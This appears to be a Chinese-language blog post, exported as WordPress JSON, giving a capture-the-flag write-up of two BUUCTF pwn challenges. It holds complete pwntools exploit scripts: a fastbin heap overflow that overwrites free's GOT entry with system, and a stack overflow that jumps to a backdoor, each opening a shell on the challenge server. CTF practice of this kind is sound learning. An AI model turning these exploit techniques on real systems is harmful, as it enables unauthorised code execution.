{"id":703,"date":"2025-11-17T21:48:34","date_gmt":"2025-11-17T13:48:34","guid":{"rendered":"http:\/\/lycoreco.cn\/?p=703"},"modified":"2025-11-17T21:48:36","modified_gmt":"2025-11-17T13:48:36","slug":"buuctfzjctf-2019easyheap%e3%80%81mrctf2020_easyrop","status":"publish","type":"post","link":"http:\/\/lycoreco.cn\/index.php\/2025\/11\/17\/buuctfzjctf-2019easyheap%e3%80%81mrctf2020_easyrop\/","title":{"rendered":"buuctf:[ZJCTF 2019]EasyHeap\u3001mrctf2020_easyrop"},"content":{"rendered":"\n


1\u3001EasyHeap\u5206\u6790<\/h2>\n\n\n\n


checksec:<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n


\u5f00\u4e86canary\u548cNX,\u8fd0\u884c\u4ee5\u540e\u5c31\u662f\u4e00\u4e2a\u5178\u578b\u7684\u5806\u9898\u76ee\u5f55<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u529f\u80fd\u6709\u521b\u5efa\uff0c\u7f16\u8f91\uff0c\u5220\u9664\uff0c\u63a5\u4e0b\u6765\u62d6\u8fdbida\u770b\u770b\u5b9e\u73b0<\/p>\n\n\n\n

\u4e00\u6765\u5c31\u770b\u5230\u6709\u540e\u95e8\u51fd\u6570\uff1a<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n


main:<\/p>\n\n\n\n

int __fastcall __noreturn main(int argc, const char **argv, const char **envp)\n{\n  int n3; \/\/ eax\n  char buf[8]; \/\/ [rsp+0h] [rbp-10h] BYREF\n  unsigned __int64 v5; \/\/ [rsp+8h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  setvbuf(stdout, 0, 2, 0);\n  setvbuf(stdin, 0, 2, 0);\n  while ( 1 )\n  {\n    while ( 1 )\n    {\n      menu();\n      read(0, buf, 8u);\n      n3 = atoi(buf);\n      if ( n3 != 3 )\n        break;\n      delete_heap();\n    }\n    if ( n3 > 3 )\n    {\n      if ( n3 == 4 )\n        exit(0);\n      if ( n3 == 4869 )\n      {\n        if ( (unsigned __int64)magic <= 0x1305 )\n        {\n          puts(\"So sad !\");\n        }\n        else\n        {\n          puts(\"Congrt !\");\n          l33t();\n        }\n      }\n      else\n      {\nLABEL_17:\n        puts(\"Invalid Choice\");\n      }\n    }\n    else if ( n3 == 1 )\n    {\n      create_heap();\n    }\n    else\n    {\n      if ( n3 != 2 )\n        goto LABEL_17;\n      edit_heap();\n    }\n  }\n}<\/code><\/pre>\n\n\n\n

\u5173\u952e\u5728\u6b64\uff1a<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5982\u679c\u6211\u4eec\u80fd\u63a7\u5236magic>4896\u5c31\u53ef\u4ee5\u76f4\u901a\u540e\u95e8\uff0c\u73b0\u5728\u7684\u95ee\u9898\u662f\u600e\u4e48\u53ef\u63a7\u5236\u5b83<\/p>\n\n\n\n
magic\u5728\u54ea\u91cc\uff1f<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u53cc\u51fb\u53d1\u73b0\u5b83\u5728bss\u6bb5\uff0c\u6ce8\u610f\u5230create_pwn\u4e2d\u7684chuck\u5b58\u5728heaparray\uff0c\u800cheaparray\u5b58\u5728bass\u6bb5<\/p>\n\n\n\n
create_heap:<\/p>\n\n\n\n
unsigned __int64 create_heap()\n{\n  int i; \/\/ [rsp+4h] [rbp-1Ch]\n  size_t size; \/\/ [rsp+8h] [rbp-18h]\n  char buf[8]; \/\/ [rsp+10h] [rbp-10h] BYREF\n  unsigned __int64 v4; \/\/ [rsp+18h] [rbp-8h]\n\n  v4 = __readfsqword(0x28u);\n  for ( i = 0; i <= 9; ++i )\n  {\n    if ( !*(&heaparray + i) )\n    {\n      printf(\"Size of Heap : \");\n      read(0, buf, 8u);\n      size = atoi(buf);\n      *(&heaparray + i) = malloc(size);\n      if ( !*(&heaparray + i) )\n      {\n        puts(\"Allocate Error\");\n        exit(2);\n      }\n      printf(\"Content of heap:\");\n      read_input(*(&heaparray + i), size);\n      puts(\"SuccessFul\");\n      return __readfsqword(0x28u) ^ v4;\n    }\n  }\n  return __readfsqword(0x28u) ^ v4;\n}<\/code><\/pre>\n\n\n\n
\u53ef\u4ee5\u7533\u8bf7\u4efb\u610f\u5927\u5c0f\u7684size<\/p>\n\n\n\n
edit_heap<\/p>\n\n\n\n
unsigned __int64 edit_heap()\n{\n  int n0xA; \/\/ [rsp+4h] [rbp-1Ch]\n  size_t size; \/\/ [rsp+8h] [rbp-18h]\n  char buf[8]; \/\/ [rsp+10h] [rbp-10h] BYREF\n  unsigned __int64 v4; \/\/ [rsp+18h] [rbp-8h]\n\n  v4 = __readfsqword(0x28u);\n  printf(\"Index :\");\n  read(0, buf, 4u);\n  n0xA = atoi(buf);\n  if ( (unsigned int)n0xA >= 0xA )\n  {\n    puts(\"Out of bound!\");\n    _exit(0);\n  }\n  if ( *(&heaparray + n0xA) )\n  {\n    printf(\"Size of Heap : \");\n    read(0, buf, 8u);\n    size = atoi(buf);\n    printf(\"Content of heap : \");\n    read_input(*(&heaparray + n0xA), size);\n    puts(\"Done !\");\n  }\n  else\n  {\n    puts(\"No such heap !\");\n  }\n  return __readfsqword(0x28u) ^ v4;\n}<\/code><\/pre>\n\n\n\n
\u770b\u4f3c\u5f88\u6b63\u5e38\u7684\u4fee\u6539\uff0c\u4f46\u662f\u53ef\u4ee5\u5229\u7528\u5b83\u628a\u4e24\u4e2a\u76f8\u90bb\u5806\u4e2d\u7684\u5176\u4e2d\u4e00\u4e2a\u4fee\u6539\u4e3a\u6bd4\u4e4b\u524d\u5927\u7684\u5927\u5c0f\u8fdb\u800c\u4fee\u6539\u4e0b\u4e00\u4e2a\u5bf9\u7684\u5934<\/p>\n\n\n\n
delete_heap:<\/p>\n\n\n\n
unsigned __int64 delete_heap()\n{\n  int n0xA; \/\/ [rsp+Ch] [rbp-14h]\n  char buf[8]; \/\/ [rsp+10h] [rbp-10h] BYREF\n  unsigned __int64 v3; \/\/ [rsp+18h] [rbp-8h]\n\n  v3 = __readfsqword(0x28u);\n  printf(\"Index :\");\n  read(0, buf, 4u);\n  n0xA = atoi(buf);\n  if ( (unsigned int)n0xA >= 10 )\n  {\n    puts(\"Out of bound!\");\n    _exit(0);\n  }\n  if ( *(&heaparray + n0xA) )\n  {\n    free(*(&heaparray + n0xA));\n    *(&heaparray + n0xA) = 0;\n    puts(\"Done !\");\n  }\n  else\n  {\n    puts(\"No such heap !\");\n  }\n  return __readfsqword(0x28u) ^ v3;\n}<\/code><\/pre>\n\n\n\n
\u91ca\u653e\u4e4b\u540e\u6307\u9488\u7f6e\u96f6\uff0c\u4e5f\u6709\u68c0\u67e5\u8be5\u5806\u662f\u5426\u88ab\u91ca\u653e\uff0c\u95ee\u9898\u4e0d\u5927<\/p>\n\n\n\n
\u8fd9\u9053\u9898\u5df2\u7ecf\u7ed9\u4e86\u6211\u4eecsystem_plt\u548csystem_got\uff0c\u800c\u4e14\u6ca1\u6709\u5f00\u542f\u5730\u5740\u968f\u673a\u5316\uff0c\u7528\u4e0d\u7740\u6211\u4eec\u53bb\u6cc4\u9732\u5730\u5740\uff0c\u53ea\u9700\u8981\u4fee\u6539free_got\u4e3asystem_plt\u5373\u53ef<\/p>\n\n\n\n
\u76ee\u524d\u7684\u601d\u8def\u662f\uff1a<\/p>\n\n\n\n
    \n
  • \u521b\u5efa\u591a\u4e2a\u5806\u5757\uff0c\u5206\u914d\u8db3\u591f\u7684\u7a7a\u95f4\u3002<\/li>\n\n\n\n
  • \u5220\u9664\u4e00\u4e2a\u5806\u5757\uff0c\u4f7f\u5176\u8fdb\u5165\u7a7a\u95f2\u5217\u8868\u3002<\/li>\n\n\n\n
  • \u5229\u7528\u5806\u6ea2\u51fa\u4f2a\u9020\u5806\u5757\u7684 fd<\/code> \u548c bk<\/code> \u6307\u9488\u3002<\/li>\n\n\n\n
  • \u901a\u8fc7\u8fdb\u4e00\u6b65\u7684\u6ea2\u51fa\u4fee\u6539\u5806\u5757\u5185\u5bb9\uff0c\u63a7\u5236 free_got<\/code> \u8868\u7684\u5185\u5bb9\u3002<\/li>\n\n\n\n
  • \u901a\u8fc7\u4fee\u6539 free_got<\/code> \u8868\u4f7f free<\/code> \u8c03\u7528 system<\/code> \u51fd\u6570\u3002<\/li>\n\n\n\n
  • \u5220\u9664\u5806\u5757\u65f6\uff0c\u89e6\u53d1 system(\"\/bin\/sh\")<\/code> \u6267\u884c\uff0c\u4ece\u800c\u83b7\u5f97 shell\u3002<\/li>\n<\/ul>\n\n\n\n

    2\u3001Easyheap\u5b9e\u64cd<\/h2>\n\n\n\n
    from pwn import *\ncontext(arch=\"amd64\",log_level=\"debug\")\np=process(\"easyheap\")\n#p=remote(\"\",)\n\ndef create(size,content):\n    p.sendlineafter(\"Your choice :\",str(1))\n    p.sendlineafter(\"Size of Heap :\",str(size))\n    p.sendlineafter(\"Content of heap:\",content)\n\ndef edit(index,size,content):\n    p.sendlineafter(\"Your choice :\",str(2))\n    p.sendlineafter(\"Index :\",str(index))\n    p.sendlineafter(\"Size of Heap : \",str(size))\n    p.sendlineafter(\"Content of heap : \",content)\n\ndef delete(index):\n    p.sendlineafter(\"Your choice :\",str(3))\n    p.sendlineafter(\"Index :\",str(index))\n\ndef tiaoshi():\n    gdb.attach(p)\n    pause()\n\ncreate(60,b'aaaa')#0\ncreate(60,b'bbbb')#1\ncreate(60,b'cccc')#2\n\ndelete(1)\ntiaoshi()\np.interactive()\n<\/code><\/pre>\n\n\n\n

    \u7531\u4e8e\u8c03\u8bd5\u7684\u65f6\u5019\u6ca1\u6709\u6b63\u786e\u52a0\u8f7d\u7b26\u53f7\u8868\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u597d\u4eceheaparray\u7684\u5730\u5740\u5f80\u4e0a\u6162\u6162\u627e\u7a7a\u95f4<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u8fd9\u91cc\u6709\u4e00\u4e2asize\u5927\u5c0f\u662f0x7e,\u6240\u4ee5\u8ddfchunk1\u4e00\u6837\u5927\u5c0f\u5e94\u8be5\u662f0x70,\u4e5f\u8bc1\u660e\u4e86\u6211\u4eec\u7533\u8bf7\u76840x60\u5df2\u7ecf\u53ef\u4ee5\u901a\u8fc7fastbin\u9a8c\u8bc1\u3002<\/p>\n\n\n\n
    \u63a5\u4e0b\u6765\u6211\u4eec\u5c31\u5728\u8fd9\u91cc\u4f2a\u9020chunk\u6ea2\u51fa\u5230heaparray\u6570\u7ec4\u8fbe\u5230\u63a7\u5236\u7684\u76ee\u7684\uff0c\u9996\u5148\u6211\u4eec\u8981\u628afree\u6389\u7684chunk\u7684fd\u6307\u9488\u6539\u6389<\/p>\n\n\n\n
    from pwn import *\ncontext(arch=\"amd64\",log_level=\"debug\")\n#p=process(\"easyheap\")\np=remote(\"node5.buuoj.cn\",26987)\nelf=ELF(\".\/easyheap\")\nfree_got=elf.got['free']\nsys_plt=elf.plt['system']\n\ndef create(size,content):\n    p.sendlineafter(\"Your choice :\",str(1))\n    p.sendlineafter(\"Size of Heap :\",str(size))\n    p.sendlineafter(\"Content of heap:\",content)\n\ndef edit(index,size,content):\n    p.sendlineafter(\"Your choice :\",str(2))\n    p.sendlineafter(\"Index :\",str(index))\n    p.sendlineafter(\"Size of Heap : \",str(size))\n    p.sendlineafter(\"Content of heap : \",content)\n\ndef delete(index):\n    p.sendlineafter(\"Your choice :\",str(3))\n    p.sendlineafter(\"Index :\",str(index))\n\ndef tiaoshi():\n    gdb.attach(p)\n    pause()\n\ncreate(0x60,b'aaaa')#0\ncreate(0x60,b'bbbb')#1\ncreate(0x60,b'cccc')#2\n\ndelete(1)\n#tiaoshi()\n\naddr=0x6020ad\npayload=b'a'*0x60+p64(0)+p64(0x71)+p64(addr)\nedit(0,0x100,payload)\ncreate(0x60,b'eeee')#3\ncreate(0x60,b'ffff')#4\n\npayload=b'\/bin\/sh\\x00'.ljust(0x23,b'a')+p64(free_got)\nedit(3,200,payload)\n\nedit(0,0x8,p64(sys_plt))\ndelete(3)\n\np.interactive()\n<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    3\u3001mrctf2020_easyrop<\/h3>\n\n\n\n
    checksec:<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    64\u4f4d\u5f00\u4e86NX\uff0c\u8fd0\u884c\u4ee5\u540e\u53d1\u73b0\u6709\u4e00\u4e2a\u8f93\u5165\uff0c\u4f46\u662f\u8f93\u5565\u90fd\u662fhahaha,\u8ddf\u50bb\u5b50\u4e00\u6837<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u62d6\u8fdbida\u770b\u770b\uff1a<\/p>\n\n\n\n
    \u8fd9\u9053\u9898\u662f\u6709\/bin\/sh\u7684<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n

    main\u51fd\u6570\uff1a<\/p>\n\n\n\n
    int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  int n2; \/\/ [rsp+Ch] [rbp-314h] BYREF\n  _BYTE v5[784]; \/\/ [rsp+10h] [rbp-310h] BYREF\n\n  do\n  {\n    fflush(stdin);\n    __isoc99_scanf(\"%d\", &n2);\n    if ( n2 == 1 )\n    {\n      lala(v5);\n    }\n    else if ( n2 == 2 )\n    {\n      hehe(v5);\n    }\n    else if ( n2 )\n    {\n      byby(v5);\n    }\n    else\n    {\n      haha(v5);\n    }\n  }\n  while ( n2 != 7 );\n  return 0;\n}<\/code><\/pre>\n\n\n\n
    \u539f\u6765\u662f\u8f93\u5165\u6570\u5b57\u9009\u62e9\u51fd\u6570\uff0c\u90a3\u5c31\u8bfb\u8bfb\u4e0d\u540c\u7684\u9009\u62e9<\/p>\n\n\n\n
    \u90091\u662flala\u53c2\u6570\u662fv5<\/p>\n\n\n\n
    ssize_t __fastcall lala(void *buf)\n{\n  puts(\"lalalalalalala\");\n  return read(0, buf, 0x200u);\/\/v5\u8db3\u591f\u5927\u4e0d\u4f1a\u6ea2\u51fa\n}<\/code><\/pre>\n\n\n\n

    \u90092\u662fhehe<\/p>\n\n\n\n
    ssize_t __fastcall hehe(void *buf)\n{\n  puts(\"hehehehehehehe\");\n  return read(0, buf, 0x300u);\n}<\/code><\/pre>\n\n\n\n
    v5\u5927\u5c0f\u662f784\uff0c\u800c0x300\u662f768\u4e0d\u4f1a\u6ea2\u51fa<\/p>\n\n\n\n
    \u5982\u679c\u8f93\u51657\uff0c\u90a3\u4e48\u5c31\u4f1a\u6267\u884cbyby<\/p>\n\n\n\n
    ssize_t __fastcall byby(const char *s)\n{\n  size_t v1; \/\/ rax\n\n  strlen(s);\n  puts(\"bybybybybybyby\");\n  v1 = strlen(s);\n  return read(0, (void *)&s[v1], 0x100u);\/\/\u8fd9\u91cc\u4f1a\u5728\u4e4b\u524d\u7684\u57fa\u7840\u4e0a\u8ffd\u52a0256\n}<\/code><\/pre>\n\n\n\n

    \u5982\u679c\u6211\u4eec\u5148hehe\u518d\u8ffd\u52a0\u5c31\u4f1a\u9020\u6210\u6808\u6ea2\u51fa\u8df3\u8f6c\u5230\u540e\u95e8\uff0c\u5176\u5b9e\u662f\u6709\u540e\u95e8\u7684<\/p>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    \u5730\u5740\u662f\uff1a<\/p>\n\n\n\n
    0x40072A<\/p>\n\n\n\n
    from pwn import*\ncontext(arch=\"amd64\",log_level=\"debug\")\np=remote(\"node5.buuoj.cn\",29289)\n\nback=0x40072A\np.sendline(str(2))\nsleep(1)\npayload1=b'a'*0x300\np.send(payload1)\n#p.sendlineafter(str(2),payload)\n\np.sendline(str(7))\nsleep(1)\/\/\u7ed9\u4e00\u70b9\u65f6\u95f4\u6253\u5305\uff0c\u592a\u5feb\u7684\u8bdd\u6253\u4e0d\u901a\npayload=b'a'*0x12+p64(back)\np.send(payload)\n#p.sendlineafter(str(7),payload)\np.interactive()<\/code><\/pre>\n\n\n\n
    \"\"<\/div><\/figure>\n\n\n\n
    <\/p>\n","protected":false},"excerpt":{"rendered":"
    1\u3001EasyHeap\u5206\u6790 checksec: \u5f00\u4e86canary\u548cNX,\u8fd0\u884c\u4ee5\u540e\u5c31\u662f\u4e00\u4e2a\u5178\u578b\u7684\u5806\u9898\u76ee\u5f55 \u529f\u80fd\u6709\u521b […]<\/p>\n","protected":false},"author":1,"featured_media":717,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[4,6],"class_list":["post-703","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learn","tag-pwn","tag-6"],"_links":{"self":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/703","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/comments?post=703"}],"version-history":[{"count":1,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/703\/revisions"}],"predecessor-version":[{"id":718,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/posts\/703\/revisions\/718"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media\/717"}],"wp:attachment":[{"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/media?parent=703"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/categories?post=703"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/lycoreco.cn\/index.php\/wp-json\/wp\/v2\/tags?post=703"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}